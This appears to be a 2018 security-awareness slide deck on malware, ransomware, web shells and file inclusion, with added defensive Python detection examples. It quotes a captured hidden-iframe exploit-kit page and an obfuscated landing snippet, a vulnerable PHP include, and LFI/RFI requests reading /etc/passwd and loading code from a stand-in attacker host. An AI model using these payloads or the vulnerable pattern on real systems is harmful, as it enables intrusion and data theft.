By Ravi Kishore K, e-Security Team, Technical Officer, C-DAC, Hyd.

Post on 24-Mar-2018


Malware

• Malware is short for Malicious Software

• Software that can be used to compromise computer functions, steal data, bypass access controls, or otherwise cause harm to the host computer.

• Malware is a broad term that refers to a variety of malicious programs.

C-DAC, Hyderabad 2

"The only truly secure system is one that is powered off, cast in a block of concrete & sealed in a lead-lined room with armed guards"

- Gene Spafford

90% of companies got hacked

To name a few

60% got hacked twice

50% are unsure about the hack

Entry Points of Malware

• Applications

• Portable Storage Devices

• Web Browser


Types of Malware

• Adware: Displays ads on your computer. Least dangerous.

• Spyware: Tracks your internet activity in order to serve adware.

• Virus: A program or piece of code that attaches itself to another piece of software and reproduces itself when that software is run.

• Worm: A program that self-replicates via the network and destroys data and files on the computer.

• Trojan: Discovers your financial information, takes over your computer's system resources, and in larger systems creates a "denial-of-service attack". Most dangerous.

Types of Malware

• Logic Bomb: Logic bombs are usually programs that use either time or an event as the trigger. When the condition(s) stipulated in the instruction set are met, the code present in the payload is executed.

• Rootkit: Rootkits are (sets of) programs used to alter standard operating system functionality in order to hide the malicious activity they perform. They replace the kernel, netstat, ls, ps, etc. with their own set of programs.

• Backdoor: A backdoor is an alternative entrance into a system. Backdoors are used to bypass the existing security mechanisms built into systems.

Types of Malware

• Keylogger: Records everything you type on your PC in order to glean your log-in names, passwords, and other sensitive information, and send it on to the source of the keylogging program

• Ransomware: Ransomware prevents the user from using their computer or accessing their data. It encrypts files or completely locks the computer and demands a ransom.

Anatomy of Ransomware

Ransom Message (two screenshot slides)

Mobile Ransomware

• The latest Android ransomware copies Google's design style to make it appear more legitimate and intimidating when it displays fake FBI warnings on users' lock screens.

• Phone ransomware has started to encrypt files, such as pictures, rather than simply changing the phone's access PIN.

Malware

Ransomware Incident

Buggy Ransomware via Apache's Blackhole Exploit Kit

The code inside:

    <title>ERROR: The requested URL could not be retrieved</title>
    <meta http-equiv="refresh" content="3;url=/cybercrime-suspect-arrested/">
    </head><body>
    <iframe src='h00p://mongif.biz/assumed/timing_borrows.php' width=1 height=1 style='visibility:hidden;'></iframe>
    <h1>ERROR</h1>

Snippet of the landing page code (obfuscated, truncated):

<html><head><title></title></head><body> <applet code="hw" archive="/assumed/timing_borrows.php?ynafkyuv=tvmamz&vqew=fbu"> <param name="prime" value="" /> <param name="val" value="Dyy3Ojj0toA8.w?8UjViiK0eMjy808oAN?tllt_.. <div></div><script>functionc() {if(window.document)s+=String.fromCharCode(a[i]).. <script>var a = "!!8:97:!!4:32:80:!08:!!7:!03:!05:!!0:68:!0!:!!6:!0!:99:!!6:6!:!23:!.. !6:!2!:!!2:!0!:!!!:!02:32:98:6!:6!:34:!02:!!7:!!0:99:!!6:!05:!!!:!!0:34:!25:44:!05:!!5.. 98:4!:63:40:!00:46:!05:!!5:68:!0!:!02:!05:!!0:!0!:!00:40:99:4!:63:!!0:!0!:!!9:32:82:!0.. 3:!20:4!:59:!02:!!!:!!4:40:97:6!:48:59:97:60:77:97:!!6:!04:46:!09:!05:!!0:40:99:46:!08.. :48:34:93:4!:59:!02:!!!:!!4:40:97:6!:48:59:97:60:52:59:97:43:43:4!:!23:!05:!02:40:47:9.. :!!5:93:47:46:!!6:!0!:!!5:!!6:40:!00:9!:98:93:4!:4!:!23:!02:6!:!!0:97:!!8:!05:!03:97:!.. 0:97:46:!08:!0!:!!0:!03:!!6:!04:59:!02:43:43:4!:!23:!09:6!:97:9!:!02:93:46:!00:!0!:!!5.. :


Zero-day Malware

• A ZERO DAY vulnerability refers to a hole in software that is unknown to the vendor.

• This security hole is then exploited by attackers before the vendor becomes aware of it and hurries to fix it; such an exploit is called a ZERO DAY attack.

• Incident: McAfee Labs identified a zero-day vulnerability in Microsoft IE that was used as an entry point for Operation Aurora to exploit Google and at least 20 other companies (Operation Aurora, 2010).

Anti-Malware Solutions

• Signature based
  – Looks to match signatures found in files against a database of known malware
  – Since vendors have no prior knowledge of the 0-day, signature-based systems such as intrusion detection/prevention and anti-virus will not identify the threat

• Heuristic based
  – Uses rules and/or algorithms to look for commands which may indicate malicious intent
  – Able to detect malware without needing a signature
  – Zero-day threats are also detectable
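To make the difference between the two approaches concrete, here is an added Python example (not code from the deck): a signature check that hashes content against a database of already-analysed samples, and a small heuristic scanner whose rules describe the behaviour of the hidden-iframe "ERROR" page shown on an earlier slide rather than any one sample. The sample pages, the malicious.example host name (a reserved placeholder), the trusted-host list and the rules themselves are all constructed for this example. A one-character change to the iframe path defeats the signature but not the heuristics, while a benign embed from a trusted host passes both.

```python
import hashlib
import re
from urllib.parse import urlparse

# Constructed sample modelled on the "ERROR" page shown in the deck: a harmless-
# looking error page that quietly loads a hidden 1x1 iframe from another host.
# The host name is a placeholder (.example is reserved), not a real site.
SAMPLE_PAGE = """<html><head>
<title>ERROR: The requested URL could not be retrieved</title>
<meta http-equiv="refresh" content="3;url=/cybercrime-suspect-arrested/">
</head><body>
<iframe src='http://malicious.example/assumed/timing_borrows.php' width=1 height=1 style='visibility:hidden;'></iframe>
<h1>ERROR</h1>
</body></html>"""

# A trivially altered copy: one character changed in the iframe path. The
# behaviour is identical, but the hash is not.
VARIANT_PAGE = SAMPLE_PAGE.replace("timing_borrows.php", "timing_borrows2.php")

# A benign page embedding a visible player from a trusted host (constructed).
BENIGN_PAGE = """<html><body>
<iframe src="https://www.example.com/embed/123" width="560" height="315"></iframe>
</body></html>"""

# Signature database: hashes of samples the vendor has already analysed.
# Here it holds only SAMPLE_PAGE, standing in for "known malware".
KNOWN_BAD_HASHES = {hashlib.sha256(SAMPLE_PAGE.encode()).hexdigest()}


def signature_scan(content: str) -> bool:
    """Signature-based detection: hit only if this exact content was seen before."""
    return hashlib.sha256(content.encode()).hexdigest() in KNOWN_BAD_HASHES


# Heuristic rules: patterns that indicate intent rather than a specific sample.
HIDDEN_IFRAME = re.compile(
    r"<iframe[^>]*?(?:width=['\"]?[01](?![0-9])|height=['\"]?[01](?![0-9])"
    r"|visibility\s*:\s*hidden|display\s*:\s*none)", re.I)
META_REFRESH = re.compile(r"<meta[^>]+http-equiv=['\"]?refresh", re.I)
IFRAME_SRC = re.compile(r"<iframe[^>]+src=['\"]?(https?://[^'\"\s>]+)", re.I)


def heuristic_scan(content: str, trusted_hosts=("www.example.com",)) -> list:
    """Heuristic detection: returns the list of rules that fired (empty = clean)."""
    findings = []
    if HIDDEN_IFRAME.search(content):
        findings.append("hidden or 1x1 iframe")
    if META_REFRESH.search(content):
        findings.append("meta refresh redirect")
    for m in IFRAME_SRC.finditer(content):
        host = urlparse(m.group(1)).hostname
        if host and host not in trusted_hosts:
            findings.append("iframe loads content from untrusted host " + host)
    return findings


def compare_detection(content: str) -> dict:
    """Run both approaches on one page so the gap between them is visible."""
    return {"signature": signature_scan(content),
            "heuristic": heuristic_scan(content)}


if __name__ == "__main__":
    for name, page in [("known sample", SAMPLE_PAGE),
                       ("unseen variant", VARIANT_PAGE),
                       ("benign page", BENIGN_PAGE)]:
        print(name, compare_detection(page))
```

The heuristic side is deliberately small: real engines weigh many such indicators and score them, which is also where the "false alarms" mentioned on the next slide come from (a 1x1 tracking pixel served by a trusted analytics host would trip the first rule on its own).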

Mitigations to 0-day Malware

• Application Whitelisting – The organization permits all known safe production applications to run, and blocks all others.

• Heuristic Anti-Malware Solutions – Suffer slightly from false alarms.

• Update your browser software and anti-virus regularly.

• Install the DoNotTrackMe browser extension.

• Do not visit reported attack websites.

Mitigations to Malware

• Malware Identification can be done at network perimeter level, host perimeter level or at the system level.


Network Security Controls

(Diagram: a firewall placed in front of the web/application server and the database server; the traffic shown is labelled N-BIOS, FTP, HTTP(S), RPC and port 56278 ("Boom").)

Let's See a Scenario

Web Proxy Editor

Intercepts the traffic between the browser and the web server:

Web Browser <-> Proxy Server <-> Web Server

Techniques Hackers Use

• Find places to upload files/shells.

• Local File Inclusion

• Remote File Inclusion

• Brute-force weak passwords, etc.

What is a Web Shell?

• A malicious web page that provides attacker functionality such as:
  – File transfer
  – Command execution
  – Database connectivity
  – Upload / delete / modify files on the web server, etc.
  – Network reconnaissance

• Server-side scripting is used. Ex: PHP, ASP, ASPX, JSP, etc.

• A web shell runs with the same privileges as the web server user.

LOCAL FILE INCLUSION & REMOTE FILE INCLUSION


LFI:

Local File Inclusion (also known as LFI) is the process of including files on a server through the web browser.

This vulnerability occurs when a page include is not properly sanitized, and allows directory traversal characters to be injected:

<? include($_GET['page']); ?>

General usage : http://localhost/index.php?page=contact_us.php

Attacker : http://localhost/index.php?page=../../../etc/passwd

Screenshot: Local File Inclusion of /etc/passwd

RFI:

In Remote File Inclusion, the attacker can inject a file remotely which will then be parsed by the PHP interpreter:

<? include($_GET['page']); ?>

General usage : http://localhost/index.php?page=contact_us.php

Attacker : http://localhost/index.php?page=http://attackersHost/inject.txt
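The unsanitized include on the LFI and RFI slides and the two attacker requests the deck shows can be turned into a concrete check. The Python below is an added example, not code from the deck: it mirrors what the unvalidated include resolves to, puts a hardened resolver beside it (an allowlist of page names plus a web-root containment check, the same logic a fixed index.php should apply before calling include), and runs that check over constructed access-log lines to flag LFI and RFI attempts. The web root, page names, client addresses and log lines are all assumptions made for the example.

```python
import os
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlparse

# Hypothetical web root and the only page names index.php is meant to include.
# The path is a placeholder; realpath() keeps the containment check honest on
# systems where /var is itself a symlink.
WEB_ROOT = os.path.realpath("/var/www/html")
ALLOWED_PAGES = {"contact_us.php", "about.php", "home.php"}

URL_SCHEME = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)


def resolve_page_unsafe(page: str) -> str:
    """What include($_GET['page']) effectively does with no validation: a remote
    URL is handed straight to the interpreter (RFI) and traversal sequences are
    followed out of the web root (LFI)."""
    if URL_SCHEME.match(page):
        return page
    return os.path.normpath(os.path.join(WEB_ROOT, page))


def resolve_page_safe(page: str) -> Optional[str]:
    """Hardened resolver: an allowlist of page names, plus a containment check
    so that even an allowlisted entry can never resolve outside WEB_ROOT."""
    if page not in ALLOWED_PAGES:
        return None
    candidate = os.path.realpath(os.path.join(WEB_ROOT, page))
    if os.path.commonpath([WEB_ROOT, candidate]) != WEB_ROOT:
        return None
    return candidate


def classify_request(request_path: str) -> str:
    """Classify the page= parameter of one request as ok / lfi / rfi / blocked."""
    qs = parse_qs(urlparse(request_path).query)
    # parse_qs decodes one layer of %-encoding; unquote catches double encoding.
    page = unquote(qs.get("page", [""])[0])
    if not page:
        return "ok"
    if URL_SCHEME.match(page):
        return "rfi"
    parts = page.replace("\\", "/").split("/")
    if page.startswith("/") or ".." in parts:
        return "lfi"
    return "ok" if resolve_page_safe(page) is not None else "blocked"


# Constructed access-log lines in common log format. Addresses come from the
# 203.0.113.0/24 documentation range; the second and third requests reuse the
# deck's own example payloads, the fourth is the LFI payload URL-encoded.
ACCESS_LOG = """\
203.0.113.10 - - [24/Mar/2018:10:01:02 +0530] "GET /index.php?page=contact_us.php HTTP/1.1" 200 512
203.0.113.11 - - [24/Mar/2018:10:01:05 +0530] "GET /index.php?page=../../../etc/passwd HTTP/1.1" 200 1843
203.0.113.12 - - [24/Mar/2018:10:01:09 +0530] "GET /index.php?page=http://attackersHost/inject.txt HTTP/1.1" 200 77
203.0.113.13 - - [24/Mar/2018:10:01:12 +0530] "GET /index.php?page=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1843
203.0.113.14 - - [24/Mar/2018:10:01:15 +0530] "GET /index.php?page=about.php HTTP/1.1" 200 640
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def scan_access_log(log: str) -> List[Tuple[str, str]]:
    """Return (client address, verdict) for every request that is not 'ok'."""
    hits = []
    for line in log.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        verdict = classify_request(m.group(1))
        if verdict != "ok":
            hits.append((line.split()[0], verdict))
    return hits


if __name__ == "__main__":
    for p in ["contact_us.php", "../../../etc/passwd",
              "http://attackersHost/inject.txt"]:
        print(p, "->", resolve_page_unsafe(p), "| safe:", resolve_page_safe(p))
    print(scan_access_log(ACCESS_LOG))
```

The allowlist is the real fix: with a fixed set of page names there is nothing for traversal characters or a URL to do, and the containment check only guards against a mistake in the allowlist itself. On the PHP side, disabling allow_url_include closes the RFI path as a second layer regardless of application code.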

Non Malicious Website Browsing Process


Malicious Code Delivery Process in a Compromised Legitimate site


References

• http://blog.malwaremustdie.org/2013/01/case-of-ransomware-with-backdoor.html

• https://www.sans.org/reading-room/whitepapers/incident/enterprise-survival-guide-ransomware-attacks-36962

• https://www.symantec.com/content/dam/symantec/docs/reports/istr-21-2016-en.pdf

• https://www.sans.org/reading-room/whitepapers/incident/responding-zero-day-threats-33709

• https://www.veracode.com/blog/2012/10/common-malware-types-cybersecurity-101

• Malware 101 - Viruses

• https://en.wikipedia.org/wiki/Iframe_virus

Thank You

Ravi Kishore K,

[email protected]

9703630992
